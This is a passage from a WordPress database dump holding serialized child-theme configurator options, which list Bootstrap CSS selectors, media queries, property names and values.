.table-bordered th\";i:536;s:133:\".col-sm-1, .col-sm-10, .col-sm-11, .col-sm-12, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9\";i:537;s:10:\".col-sm-12\";i:538;s:10:\".col-sm-11\";i:539;s:10:\".col-sm-10\";i:540;s:9:\".col-sm-9\";i:541;s:9:\".col-sm-8\";i:542;s:9:\".col-sm-7\";i:543;s:9:\".col-sm-6\";i:544;s:9:\".col-sm-5\";i:545;s:9:\".col-sm-4\";i:546;s:9:\".col-sm-3\";i:547;s:9:\".col-sm-2\";i:548;s:9:\".col-sm-1\";i:549;s:10:\".container\";i:550;s:17:\".dl-horizontal dt\";i:551;s:17:\".dl-horizontal dd\";i:552;s:5:\".lead\";i:553;s:133:\".col-md-1, .col-md-10, .col-md-11, .col-md-12, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9\";i:554;s:10:\".col-md-12\";i:555;s:10:\".col-md-11\";i:556;s:10:\".col-md-10\";i:557;s:9:\".col-md-9\";i:558;s:9:\".col-md-8\";i:559;s:9:\".col-md-7\";i:560;s:9:\".col-md-6\";i:561;s:9:\".col-md-5\";i:562;s:9:\".col-md-4\";i:563;s:9:\".col-md-3\";i:564;s:9:\".col-md-2\";i:565;s:9:\".col-md-1\";i:566;s:133:\".col-lg-1, .col-lg-10, .col-lg-11, .col-lg-12, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9\";i:567;s:10:\".col-lg-12\";i:568;s:10:\".col-lg-11\";i:569;s:10:\".col-lg-10\";i:570;s:9:\".col-lg-9\";i:571;s:9:\".col-lg-8\";i:572;s:9:\".col-lg-7\";i:573;s:9:\".col-lg-6\";i:574;s:9:\".col-lg-5\";i:575;s:9:\".col-lg-4\";i:576;s:9:\".col-lg-3\";i:577;s:9:\".col-lg-2\";i:578;s:9:\".col-lg-1\";i:579;s:81:\"input[type=date], input[type=time], input[type=datetime-local], input[type=month]\";i:580;s:264:\".input-group-sm input[type=date], .input-group-sm input[type=time], .input-group-sm input[type=datetime-local], .input-group-sm input[type=month], input[type=date].input-sm, input[type=time].input-sm, input[type=datetime-local].input-sm, input[type=month].input-sm\";i:581;s:264:\".input-group-lg input[type=date], .input-group-lg input[type=time], .input-group-lg input[type=datetime-local], .input-group-lg input[type=month], input[type=date].input-lg, input[type=time].input-lg, input[type=datetime-local].input-lg, input[type=month].input-lg\";i:582;s:4:\"html\";i:583;s:102:\"article, aside, details, figcaption, figure, footer, header, hgroup, main, menu, nav, section, summary\";i:584;s:30:\"audio, canvas, progress, video\";i:585;s:21:\"audio:not([controls])\";i:586;s:18:\"[hidden], template\";i:587;s:17:\"a:active, a:hover\";i:588;s:9:\"b, strong\";i:589;s:3:\"dfn\";i:590;s:4:\"mark\";i:591;s:8:\"sub, sup\";i:592;s:3:\"sup\";i:593;s:3:\"sub\";i:594;s:14:\"svg:not(:root)\";i:595;s:2:\"hr\";i:596;s:3:\"pre\";i:597;s:20:\"code, kbd, pre, samp\";i:598;s:41:\"button, input, optgroup, select, textarea\";i:599;s:6:\"button\";i:600;s:14:\"button, select\";i:601;s:70:\"button, html input[type=button], input[type=reset], input[type=submit]\";i:602;s:38:\"button[disabled], html input[disabled]\";i:603;s:49:\"button::-moz-focus-inner, input::-moz-focus-inner\";i:604;s:39:\"input[type=checkbox], input[type=radio]\";i:605;s:92:\"input[type=number]::-webkit-inner-spin-button, input[type=number]::-webkit-outer-spin-button\";i:606;s:95:\"input[type=search]::-webkit-search-cancel-button, input[type=search]::-webkit-search-decoration\";i:607;s:8:\"optgroup\";i:608;s:6:\"td, th\";i:609;s:31:\"button, input, select, textarea\";i:610;s:16:\"a:focus, a:hover\";i:611;s:7:\"a:focus\";i:612;s:6:\"figure\";i:613;s:15:\".img-responsive\";i:614;s:12:\".img-rounded\";i:615;s:14:\".img-thumbnail\";i:616;s:11:\".img-circle\";i:617;s:8:\".sr-only\";i:618;s:51:\".sr-only-focusable:active, .sr-only-focusable:focus\";i:619;s:52:\".h1, .h2, .h3, .h4, .h5, .h6, h1, h2, h3, h4, h5, h6\";i:620;s:262:\".h1 .small, .h1 small, .h2 .small, .h2 small, .h3 .small, .h3 small, .h4 .small, .h4 small, .h5 .small, .h5 small, .h6 .small, .h6 small, h1 .small, h1 small, h2 .small, h2 small, h3 .small, h3 small, h4 .small, h4 small, h5 .small, h5 small, h6 .small, h6 small\";i:621;s:25:\".h1, .h2, .h3, h1, h2, h3\";i:622;s:130:\".h1 .small, .h1 small, .h2 .small, .h2 small, .h3 .small, .h3 small, h1 .small, h1 small, h2 .small, h2 small, h3 .small, h3 small\";i:623;s:25:\".h4, .h5, .h6, h4, h5, h6\";i:624;s:130:\".h4 .small, .h4 small, .h5 .small, .h5 small, .h6 .small, .h6 small, h4 .small, h4 small, h5 .small, h5 small, h6 .small, h6 small\";i:625;s:7:\".h1, h1\";i:626;s:7:\".h2, h2\";i:627;s:7:\".h3, h3\";i:628;s:7:\".h4, h4\";i:629;s:7:\".h5, h5\";i:630;s:7:\".h6, h6\";i:631;s:13:\".small, small\";i:632;s:11:\".mark, mark\";i:633;s:10:\".text-left\";i:634;s:11:\".text-right\";i:635;s:12:\".text-center\";i:636;s:13:\".text-justify\";i:637;s:12:\".text-nowrap\";i:638;s:15:\".text-lowercase\";i:639;s:15:\".text-uppercase\";i:640;s:16:\".text-capitalize\";i:641;s:11:\".text-muted\";i:642;s:13:\".text-primary\";i:643;s:20:\"a.text-primary:hover\";i:644;s:13:\".text-success\";i:645;s:20:\"a.text-success:hover\";i:646;s:10:\".text-info\";i:647;s:17:\"a.text-info:hover\";i:648;s:13:\".text-warning\";i:649;s:20:\"a.text-warning:hover\";i:650;s:12:\".text-danger\";i:651;s:19:\"a.text-danger:hover\";i:652;s:11:\".bg-primary\";i:653;s:18:\"a.bg-primary:hover\";i:654;s:11:\".bg-success\";i:655;s:18:\"a.bg-success:hover\";i:656;s:8:\".bg-info\";i:657;s:15:\"a.bg-info:hover\";i:658;s:11:\".bg-warning\";i:659;s:18:\"a.bg-warning:hover\";i:660;s:10:\".bg-danger\";i:661;s:17:\"a.bg-danger:hover\";i:662;s:6:\"ol, ul\";i:663;s:26:\"ol ol, ol ul, ul ol, ul ul\";i:664;s:14:\".list-unstyled\";i:665;s:12:\".list-inline\";i:666;s:15:\".list-inline>li\";i:667;s:2:\"dl\";i:668;s:6:\"dd, dt\";i:669;s:2:\"dt\";i:670;s:2:\"dd\";i:671;s:38:\"abbr[data-original-title], abbr[title]\";i:672;s:11:\".initialism\";i:673;s:10:\"blockquote\";i:674;s:75:\"blockquote ol:last-child, blockquote p:last-child, blockquote ul:last-child\";i:675;s:54:\"blockquote .small, blockquote footer, blockquote small\";i:676;s:75:\"blockquote .small:before, blockquote footer:before, blockquote small:before\";i:677;s:42:\".blockquote-reverse, blockquote.pull-right\";i:678;s:212:\".blockquote-reverse .small:before, .blockquote-reverse footer:before, .blockquote-reverse small:before, blockquote.pull-right .small:before, blockquote.pull-right footer:before, blockquote.pull-right small:before\";i:679;s:206:\".blockquote-reverse .small:after, .blockquote-reverse footer:after, .blockquote-reverse small:after, blockquote.pull-right .small:after, blockquote.pull-right footer:after, blockquote.pull-right small:after\";i:680;s:7:\"address\";i:681;s:4:\"code\";i:682;s:3:\"kbd\";i:683;s:7:\"kbd kbd\";i:684;s:8:\"pre code\";i:685;s:15:\".pre-scrollable\";i:686;s:28:\".container, .container-fluid\";i:687;s:4:\".row\";i:688;s:538:\".col-lg-1, .col-lg-10, .col-lg-11, .col-lg-12, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-md-1, .col-md-10, .col-md-11, .col-md-12, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-sm-1, .col-sm-10, .col-sm-11, .col-sm-12, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-xs-1, .col-xs-10, .col-xs-11, .col-xs-12, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9\";i:689;s:133:\".col-xs-1, .col-xs-10, .col-xs-11, .col-xs-12, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9\";i:690;s:10:\".col-xs-12\";i:691;s:10:\".col-xs-11\";i:692;s:10:\".col-xs-10\";i:693;s:9:\".col-xs-9\";i:694;s:9:\".col-xs-8\";i:695;s:9:\".col-xs-7\";i:696;s:9:\".col-xs-6\";i:697;s:9:\".col-xs-5\";i:698;s:9:\".col-xs-4\";i:699;s:9:\".col-xs-3\";i:700;s:9:\".col-xs-2\";i:701;s:9:\".col-xs-1\";i:702;s:15:\".col-xs-pull-12\";i:703;s:15:\".col-xs-pull-11\";i:704;s:15:\".col-xs-pull-10\";i:705;s:14:\".col-xs-pull-9\";i:706;s:14:\".col-xs-pull-8\";i:707;s:14:\".col-xs-pull-7\";i:708;s:14:\".col-xs-pull-6\";i:709;s:14:\".col-xs-pull-5\";i:710;s:14:\".col-xs-pull-4\";i:711;s:14:\".col-xs-pull-3\";i:712;s:14:\".col-xs-pull-2\";i:713;s:14:\".col-xs-pull-1\";i:714;s:14:\".col-xs-pull-0\";i:715;s:15:\".col-xs-push-12\";i:716;s:15:\".col-xs-push-11\";i:717;s:15:\".col-xs-push-10\";i:718;s:14:\".col-xs-push-9\";i:719;s:14:\".col-xs-push-8\";i:720;s:14:\".col-xs-push-7\";i:721;s:14:\".col-xs-push-6\";i:722;s:14:\".col-xs-push-5\";i:723;s:14:\".col-xs-push-4\";i:724;s:14:\".col-xs-push-3\";i:725;s:14:\".col-xs-push-2\";i:726;s:14:\".col-xs-push-1\";i:727;s:14:\".col-xs-push-0\";i:728;s:17:\".col-xs-offset-12\";i:729;s:17:\".col-xs-offset-11\";i:730;s:17:\".col-xs-offset-10\";i:731;s:16:\".col-xs-offset-9\";i:732;s:16:\".col-xs-offset-8\";i:733;s:16:\".col-xs-offset-7\";i:734;s:16:\".col-xs-offset-6\";i:735;s:16:\".col-xs-offset-5\";i:736;s:16:\".col-xs-offset-4\";i:737;s:16:\".col-xs-offset-3\";i:738;s:16:\".col-xs-offset-2\";i:739;s:16:\".col-xs-offset-1\";i:740;s:16:\".col-xs-offset-0\";i:741;s:7:\"caption\";i:742;s:2:\"th\";i:743;s:22:\"table col[class*=col-]\";i:744;s:44:\"table td[class*=col-], table th[class*=col-]\";i:745;s:8:\"fieldset\";i:746;s:6:\"legend\";i:747;s:5:\"label\";i:748;s:18:\"input[type=search]\";i:749;s:16:\"input[type=file]\";i:750;s:17:\"input[type=range]\";i:751;s:30:\"select[multiple], select[size]\";i:752;s:75:\"input[type=file]:focus, input[type=checkbox]:focus, input[type=radio]:focus\";i:753;s:6:\"output\";i:754;s:11:\".form-group\";i:755;s:17:\".checkbox, .radio\";i:756;s:29:\".checkbox label, .radio label\";i:757;s:128:\".checkbox input[type=checkbox], .checkbox-inline input[type=checkbox], .radio input[type=radio], .radio-inline input[type=radio]\";i:758;s:34:\".checkbox+.checkbox, .radio+.radio\";i:759;s:31:\".checkbox-inline, .radio-inline\";i:760;s:62:\".checkbox-inline+.checkbox-inline, .radio-inline+.radio-inline\";i:761;s:197:\"fieldset[disabled] input[type=checkbox], fieldset[disabled] input[type=radio], input[type=checkbox].disabled, input[type=checkbox][disabled], input[type=radio].disabled, input[type=radio][disabled]\";i:762;s:7:\".btn-lg\";i:763;s:7:\".btn-sm\";i:764;s:7:\".btn-xs\";i:765;s:10:\".btn-block\";i:766;s:21:\".btn-block+.btn-block\";i:767;s:87:\"input[type=button].btn-block, input[type=reset].btn-block, input[type=submit].btn-block\";i:768;s:268:\".clearfix:after, .clearfix:before, .container-fluid:after, .container-fluid:before, .container:after, .container:before, .dl-horizontal dd:after, .dl-horizontal dd:before, .form-horizontal .form-group:after, .form-horizontal .form-group:before, .row:after, .row:before\";i:769;s:130:\".clearfix:after, .container-fluid:after, .container:after, .dl-horizontal dd:after, .form-horizontal .form-group:after, .row:after\";}','no'),(9631,'chld_thm_cfg_options_dict_query','a:16:{i:1;s:42:\"@media only screen and (min-width: 1930px)\";i:2;s:42:\"@media only screen and (max-width: 1199px)\";i:3;s:41:\"@media only screen and (max-width: 991px)\";i:4;s:42:\"@media only screen and (max-width: 1024px)\";i:5;s:41:\"@media only screen and (max-width: 780px)\";i:6;s:111:\"@media only screen and (min-device-width : 768px) and (max-device-width : 1024px) and (orientation : landscape)\";i:7;s:41:\"@media only screen and (max-width: 767px)\";i:8;s:41:\"@media only screen and (max-width: 479px)\";i:9;s:41:\"@media only screen and (max-width: 320px)\";i:10;s:37:\"@media screen and (min-width: 1025px)\";i:11;s:4:\"base\";i:12;s:12:\"@media print\";i:13;s:25:\"@media (min-width: 768px)\";i:14;s:25:\"@media (min-width: 992px)\";i:15;s:26:\"@media (min-width: 1200px)\";i:16;s:53:\"@media screen and (-webkit-min-device-pixel-ratio: 0)\";}','no'),(9632,'chld_thm_cfg_options_dict_rule','a:106:{i:1;s:15:\"background-size\";i:2;s:13:\"margin-bottom\";i:3;s:5:\"width\";i:4;s:8:\"position\";i:5;s:21:\"background-attachment\";i:6;s:19:\"background-position\";i:7;s:9:\"font-size\";i:8;s:11:\"padding-top\";i:9;s:13:\"padding-right\";i:10;s:14:\"padding-bottom\";i:11;s:12:\"padding-left\";i:12;s:10:\"margin-top\";i:13;s:7:\"display\";i:14;s:10:\"text-align\";i:15;s:16:\"background-color\";i:16;s:8:\"overflow\";i:17;s:9:\"max-width\";i:18;s:12:\"margin-right\";i:19;s:11:\"margin-left\";i:20;s:10:\"min-height\";i:21;s:11:\"line-height\";i:22;s:5:\"float\";i:23;s:5:\"clear\";i:24;s:3:\"top\";i:25;s:6:\"bottom\";i:26;s:19:\"-webkit-align-items\";i:27;s:14:\"-ms-flex-align\";i:28;s:11:\"align-items\";i:29;s:5:\"color\";i:30;s:10:\"list-style\";i:31;s:15:\"text-decoration\";i:32;s:11:\"font-family\";i:33;s:27:\"-webkit-backface-visibility\";i:34;s:19:\"backface-visibility\";i:35;s:11:\"text-shadow\";i:36;s:7:\"content\";i:37;s:4:\"clip\";i:38;s:6:\"height\";i:39;s:13:\"border-radius\";i:40;s:10:\"box-shadow\";i:41;s:11:\"font-weight\";i:42;s:4:\"left\";i:43;s:7:\"z-index\";i:44;s:6:\"border\";i:45;s:9:\"word-wrap\";i:46;s:14:\"vertical-align\";i:47;s:10:\"transition\";i:48;s:7:\"outline\";i:49;s:14:\"text-transform\";i:50;s:10:\"-ms-filter\";i:51;s:6:\"filter\";i:52;s:7:\"opacity\";i:53;s:16:\"background-image\";i:54;s:18:\"-webkit-appearance\";i:55;s:10:\"max-height\";i:56;s:17:\"background-repeat\";i:57;s:10:\"visibility\";i:58;s:10:\"border-top\";i:59;s:6:\"cursor\";i:60;s:16:\"border-top-color\";i:61;s:5:\"right\";i:62;s:12:\"border-color\";i:63;s:9:\"direction\";i:64;s:9:\"transform\";i:65;s:14:\"letter-spacing\";i:66;s:26:\"-webkit-animation-duration\";i:67;s:18:\"animation-duration\";i:68;s:27:\"-webkit-animation-fill-mode\";i:69;s:19:\"animation-fill-mode\";i:70;s:22:\"-webkit-animation-name\";i:71;s:14:\"animation-name\";i:72;s:10:\"font-style\";i:73;s:13:\"border-bottom\";i:74;s:17:\"-webkit-animation\";i:75;s:9:\"animation\";i:76;s:23:\"-webkit-animation-delay\";i:77;s:15:\"animation-delay\";i:78;s:14:\"-moz-animation\";i:79;s:16:\"-ms-touch-action\";i:80;s:19:\"-webkit-user-select\";i:81;s:18:\"-khtml-user-select\";i:82;s:16:\"-moz-user-select\";i:83;s:15:\"-ms-user-select\";i:84;s:11:\"user-select\";i:85;s:27:\"-webkit-tap-highlight-color\";i:86;s:24:\"-moz-backface-visibility\";i:87;s:23:\"-ms-backface-visibility\";i:88;s:4:\"zoom\";i:89;s:9:\"42display\";i:90;s:11:\"white-space\";i:91;s:11:\"border-left\";i:92;s:17:\"page-break-inside\";i:93;s:7:\"orphans\";i:94;s:6:\"widows\";i:95;s:16:\"page-break-after\";i:96;s:15:\"border-collapse\";i:97;s:13:\"text-overflow\";i:98;s:20:\"-ms-text-size-adjust\";i:99;s:24:\"-webkit-text-size-adjust\";i:100;s:10:\"box-sizing\";i:101;s:14:\"border-spacing\";i:102;s:14:\"outline-offset\";i:103;s:12:\"border-right\";i:104;s:10:\"word-break\";i:105;s:10:\"overflow-y\";i:106;s:9:\"min-width\";}','no'),(9633,'chld_thm_cfg_options_dict_val','a:374:{i:1;s:5:\"cover\";i:2;s:0:\"\";i:3;s:4:\"18px\";i:4;s:3:\"25%\";i:5;s:5:\"455px\";i:6;s:6:\"static\";i:7;s:6:\"scroll\";i:8;s:10:\"top center\";i:9;s:4:\"24px\";i:10;s:5:\"345px\";i:11;s:1:\"0\";i:12;s:4:\"50px\";i:13;s:4:\"30px\";i:14;s:5:\"block\";i:15;s:6:\"center\";i:16;s:4:\"100%\";i:17;s:4:\"20px\";i:18;s:5:\"33.3%\";i:19;s:4:\"15px\";i:20;s:4:\"45px\";i:21;s:4:\"none\";i:22;s:15:\"rgba(0,0,0,0.9)\";i:23;s:6:\"hidden\";i:24;s:4:\"32px\";i:25;s:4:\"28px\";i:26;s:4:\"22px\";i:27;s:4:\"16px\";i:28;s:4:\"14px\";i:29;s:5:\"190px\";i:30;s:3:\"1.1\";i:31;s:4:\"10px\";i:32;s:3:\"50%\";i:33;s:4:\"left\";i:34;s:4:\"75px\";i:35;s:4:\"42px\";i:36;s:4:\"auto\";i:37;s:4:\"12px\";i:38;s:12:\"-webkit-flex\";i:39;s:11:\"-ms-flexbox\";i:40;s:4:\"flex\";i:41;s:5:\"table\";i:42;s:7:\"#d65050\";i:43;s:12:\"inline-block\";i:44;s:3:\"5px\";i:45;s:1:\"1\";i:46;s:11:\"FontAwesome\";i:47;s:7:\"inherit\";i:48;s:7:\"visible\";i:49;s:12:\"0 0 1px #222\";i:50;s:4:\"34px\";i:51;s:7:\"\'\\f099\'\";i:52;s:7:\"\'\\f09a\'\";i:53;s:7:\"\'\\f0d5\'\";i:54;s:7:\"\'\\f17d\'\";i:55;s:7:\"\'\\f231\'\";i:56;s:7:\"\'\\f167\'\";i:57;s:7:\"\'\\f16e\'\";i:58;s:7:\"\'\\f194\'\";i:59;s:7:\"\'\\f16d\'\";i:60;s:7:\"\'\\f0e1\'\";i:61;s:7:\"\'\\f180\'\";i:62;s:7:\"\'\\f173\'\";i:63;s:7:\"\'\\f1b4\'\";i:64;s:7:\"\'\\f1bd\'\";i:65;s:7:\"\'\\f1be\'\";i:66;s:7:\"\'\\f1bc\'\";i:67;s:7:\"\'\\f18a\'\";i:68;s:7:\"\'\\f168\'\";i:69;s:7:\"\'\\f181\'\";i:70;s:5:\"1.5em\";i:71;s:5:\"right\";i:72;s:24:\"rect(1px, 1px, 1px, 1px)\";i:73;s:8:\"absolute\";i:74;s:3:\"1px\";i:75;s:7:\"#f1f1f1\";i:76;s:3:\"3px\";i:77;s:30:\"0 0 2px 2px rgba(0, 0, 0, 0.6)\";i:78;s:7:\"#21759b\";i:79;s:8:\"0.875rem\";i:80;s:4:\"bold\";i:81;s:6:\"normal\";i:82;s:4:\"23px\";i:83;s:6:\"100000\";i:84;s:6:\"inline\";i:85;s:4:\"both\";i:86;s:4:\"#fff\";i:87;s:11:\"transparent\";i:88;s:10:\"break-word\";i:89;s:8:\"0.8075em\";i:90;s:3:\"top\";i:91;s:6:\"33.33%\";i:92;s:3:\"20%\";i:93;s:6:\"16.66%\";i:94;s:6:\"14.28%\";i:95;s:5:\"12.5%\";i:96;s:6:\"11.11%\";i:97;s:29:\"\"Source Sans Pro\", sans-serif\";i:98;s:7:\"#767676\";i:99;s:20:\"all 0.3s ease-in-out\";i:100;s:7:\"#443f3f\";i:101;s:4:\"33px\";i:102;s:3:\"600\";i:103;s:4:\"52px\";i:104;s:21:\"\"Raleway\", sans-serif\";i:105;s:4:\"25px\";i:106;s:8:\"relative\";i:107;s:4:\"13px\";i:108;s:3:\"700\";i:109;s:9:\"uppercase\";i:110;s:8:\"all 0.3s\";i:111;s:7:\"#fafafa\";i:112;s:17:\"1px solid #dbdbdb\";i:113;s:3:\"4px\";i:114;s:5:\"120px\";i:115;s:7:\"#a3a2a2\";i:116;s:7:\"#c3c3c3\";i:117;s:7:\"#cacaca\";i:118;s:52:\"\"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\"\";i:119;s:16:\"alpha(opacity=0)\";i:120;s:54:\"\"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\"\";i:121;s:18:\"alpha(opacity=100)\";i:122;s:14:\"1px solid #333\";i:123;s:3:\"1.2\";i:124;s:5:\"100px\";i:125;s:4:\"1000\";i:126;s:17:\"all 0.3s ease-out\";i:127;s:5:\"300px\";i:128;s:9:\"no-repeat\";i:129;s:3:\"1.6\";i:130;s:7:\"#efefef\";i:131;s:5:\"fixed\";i:132;s:4:\"40px\";i:133;s:15:\"all 0.3s linear\";i:134;s:5:\"135px\";i:135;s:4:\"27px\";i:136;s:4:\"70px\";i:137;s:3:\"500\";i:138;s:5:\"180px\";i:139;s:7:\"initial\";i:140;s:11:\"0 0 2px 2px\";i:141;s:13:\"all 0.3s ease\";i:142;s:2:\"\"\"\";i:143;s:5:\"99999\";i:144;s:7:\"#1c1c1c\";i:145;s:17:\"1px solid #252525\";i:146;s:3:\"8px\";i:147;s:11:\"Fontawesome\";i:148;s:3:\"400\";i:149;s:2:\"\'\'\";i:150;s:7:\"pointer\";i:151;s:4:\"2000\";i:152;s:7:\"#161625\";i:153;s:4:\"#222\";i:154;s:4:\"90px\";i:155;s:4:\"60px\";i:156;s:21:\"rgba(255,255,255,0.1)\";i:157;s:17:\"all 0.2s ease-out\";i:158;s:13:\"\"FontAwesome\"\";i:159;s:7:\"\"\\f0c9\"\";i:160;s:4:\"44px\";i:161;s:7:\"\"\\f107\"\";i:162;s:7:\"\"\\f106\"\";i:163;s:7:\"50% 50%\";i:164;s:4:\"35px\";i:165;s:4:\"#ddd\";i:166;s:4:\"80px\";i:167;s:4:\"17px\";i:168;s:11:\"0 3px 3px 0\";i:169;s:5:\"250px\";i:170;s:53:\"\"progid:DXImageTransform.Microsoft.Alpha(Opacity=70)\"\";i:171;s:17:\"alpha(opacity=70)\";i:172;s:3:\"0.7\";i:173;s:4:\"83px\";i:174;s:3:\"ltr\";i:175;s:18:\"translate3d(0,0,0)\";i:176;s:5:\"50% 0\";i:177;s:1:\"2\";i:178;s:16:\"translateY(-50%)\";i:179;s:2:\"10\";i:180;s:30:\"1px 1px 3px rgba(0, 0, 0, 0.3)\";i:181;s:4:\"57px\";i:182;s:4:\"67px\";i:183;s:3:\"40%\";i:184;s:4:\"-20%\";i:185;s:3:\"300\";i:186;s:5:\"-99em\";i:187;s:2:\"1s\";i:188;s:14:\"fadeInRightBig\";i:189;s:5:\"260px\";i:190;s:4:\"#ccc\";i:191;s:10:\"table-cell\";i:192;s:6:\"middle\";i:193;s:9:\"underline\";i:194;s:7:\"#5e5e5e\";i:195;s:7:\"\"\\f073\"\";i:196;s:7:\"\"\\f007\"\";i:197;s:7:\"\"\\f086\"\";i:198;s:7:\"\"\\f114\"\";i:199;s:4:\"#333\";i:200;s:6:\"italic\";i:201;s:5:\"360px\";i:202;s:4:\"65px\";i:203;s:3:\"7px\";i:204;s:4:\"#eee\";i:205;s:5:\"145px\";i:206;s:7:\"#f5f5f5\";i:207;s:5:\"140px\";i:208;s:7:\"#505050\";i:209;s:17:\"1px solid #f3f3f3\";i:210;s:7:\"#c7c7c7\";i:211;s:7:\"#f7f7f7\";i:212;s:14:\"1px solid #eee\";i:213;s:4:\"95px\";i:214;s:7:\"#252525\";i:215;s:7:\"#a8a8a8\";i:216;s:7:\"#c5c5c5\";i:217;s:4:\"36px\";i:218;s:7:\"\"\\f041\"\";i:219;s:7:\"\"\\f095\"\";i:220;s:7:\"\"\\f040\"\";i:221;s:5:\"205px\";i:222;s:4:\"#666\";i:223;s:7:\"#2e2e2e\";i:224;s:6:\"repeat\";i:225;s:3:\"0 0\";i:226;s:16:\"all 0.2s ease 0s\";i:227;s:4:\"9999\";i:228;s:5:\"-15px\";i:229;s:38:\"2s ease 0s normal none infinite bounce\";i:230;s:7:\"#de4939\";i:231;s:3:\"0.6\";i:232;s:5:\"-0.5s\";i:233;s:5:\"-45px\";i:234;s:3:\"2px\";i:235;s:8:\"all 0.5s\";i:236;s:4:\"11px\";i:237;s:5:\"-25px\";i:238;s:6:\"1170px\";i:239;s:2:\"11\";i:240;s:2:\"-1\";i:241;s:3:\"19%\";i:242;s:5:\"150px\";i:243;s:4:\"47px\";i:244;s:4:\"26px\";i:245;s:7:\"\"\\f006\"\";i:246;s:14:\"1px solid #fff\";i:247;s:17:\"1px solid #443f3f\";i:248;s:4:\"-4px\";i:249;s:15:\"background 0.3s\";i:250;s:20:\"\"Raleway\",sans-serif\";i:251;s:6:\"all 1s\";i:252;s:2:\"20\";i:253;s:3:\"0.5\";i:254;s:3:\"\"/\"\";i:255;s:4:\"-3px\";i:256;s:4:\"-1px\";i:257;s:53:\"pop-scale 0.5s 1 cubic-bezier(0.15, 0.85, 0.35, 1.25)\";i:258;s:16:\"2px solid yellow\";i:259;s:5:\"750px\";i:260;s:14:\"2px solid #fff\";i:261;s:3:\"\".\"\";i:262;s:5:\"pan-y\";i:263;s:20:\"translate3d(0, 0, 0)\";i:264;s:24:\"height 500ms ease-in-out\";i:265;s:16:\"rgba(0, 0, 0, 0)\";i:266;s:3:\"9px\";i:267;s:7:\"#d91d1d\";i:268;s:7:\"#f3f3f3\";i:269;s:22:\"opacity 1s ease-in-out\";i:270;s:7:\"#2d3340\";i:271;s:7:\"#8e8e8e\";i:272;s:3:\"70%\";i:273;s:6:\"nowrap\";i:274;s:3:\"30%\";i:275;s:17:\"1px solid #d65050\";i:276;s:52:\"pop-scale 0.5s 1 cubic-bezier(0.15, 0.85, 0.35, 1.2)\";i:277;s:17:\"3px solid #d65050\";i:278;s:17:\"2px solid #d65050\";i:279;s:19:\"\" (\" attr(href) \")\"\";i:280;s:20:\"\" (\" attr(title) \")\"\";i:281;s:14:\"1px solid #999\";i:282;s:5:\"avoid\";i:283;s:18:\"table-header-group\";i:284;s:1:\"3\";i:285;s:4:\"#000\";i:286;s:14:\"1px solid #000\";i:287;s:8:\"collapse\";i:288;s:14:\"1px solid #ddd\";i:289;s:12:\"91.66666667%\";i:290;s:12:\"83.33333333%\";i:291;s:3:\"75%\";i:292;s:12:\"66.66666667%\";i:293;s:12:\"58.33333333%\";i:294;s:12:\"41.66666667%\";i:295;s:12:\"33.33333333%\";i:296;s:12:\"16.66666667%\";i:297;s:11:\"8.33333333%\";i:298;s:5:\"160px\";i:299;s:8:\"ellipsis\";i:300;s:4:\"21px\";i:301;s:5:\"970px\";i:302;s:4:\"46px\";i:303;s:10:\"sans-serif\";i:304;s:8:\"baseline\";i:305;s:5:\".67em\";i:306;s:4:\"#ff0\";i:307;s:5:\"-.5em\";i:308;s:6:\"-.25em\";i:309;s:11:\"content-box\";i:310;s:3:\"1em\";i:311;s:6:\"button\";i:312;s:7:\"default\";i:313;s:10:\"border-box\";i:314;s:43:\"\"Helvetica Neue\",Helvetica,Arial,sans-serif\";i:315;s:10:\"1.42857143\";i:316;s:7:\"#23527c\";i:317;s:11:\"dotted thin\";i:318;s:33:\"-webkit-focus-ring-color auto 5px\";i:319;s:4:\"-2px\";i:320;s:3:\"6px\";i:321;s:19:\"all .2s ease-in-out\";i:322;s:13:\"rect(0,0,0,0)\";i:323;s:4:\"#777\";i:324;s:3:\"65%\";i:325;s:3:\"1.4\";i:326;s:3:\"85%\";i:327;s:7:\"#fcf8e3\";i:328;s:4:\".2em\";i:329;s:7:\"justify\";i:330;s:9:\"lowercase\";i:331;s:10:\"capitalize\";i:332;s:7:\"#337ab7\";i:333;s:7:\"#286090\";i:334;s:7:\"#3c763d\";i:335;s:7:\"#2b542c\";i:336;s:7:\"#31708f\";i:337;s:7:\"#245269\";i:338;s:7:\"#8a6d3b\";i:339;s:7:\"#66512c\";i:340;s:7:\"#a94442\";i:341;s:7:\"#843534\";i:342;s:7:\"#dff0d8\";i:343;s:7:\"#c1e2b3\";i:344;s:7:\"#d9edf7\";i:345;s:7:\"#afd9ee\";i:346;s:7:\"#f7ecb5\";i:347;s:7:\"#f2dede\";i:348;s:7:\"#e4b9b9\";i:349;s:4:\"-5px\";i:350;s:4:\"help\";i:351;s:15:\"1px dotted #777\";i:352;s:3:\"90%\";i:353;s:6:\"17.5px\";i:354;s:14:\"5px solid #eee\";i:355;s:3:\"80%\";i:356;s:13:\"\'\\2014 \\00A0\'\";i:357;s:13:\"\'\\00A0 \\2014\'\";i:358;s:45:\"Menlo,Monaco,Consolas,\"Courier New\",monospace\";i:359;s:7:\"#c7254e\";i:360;s:7:\"#f9f2f4\";i:361;s:30:\"inset 0 -1px 0 rgba(0,0,0,.25)\";i:362;s:5:\"9.5px\";i:363;s:9:\"break-all\";i:364;s:14:\"1px solid #ccc\";i:365;s:8:\"pre-wrap\";i:366;s:5:\"340px\";i:367;s:12:\"table-column\";i:368;s:17:\"1px solid 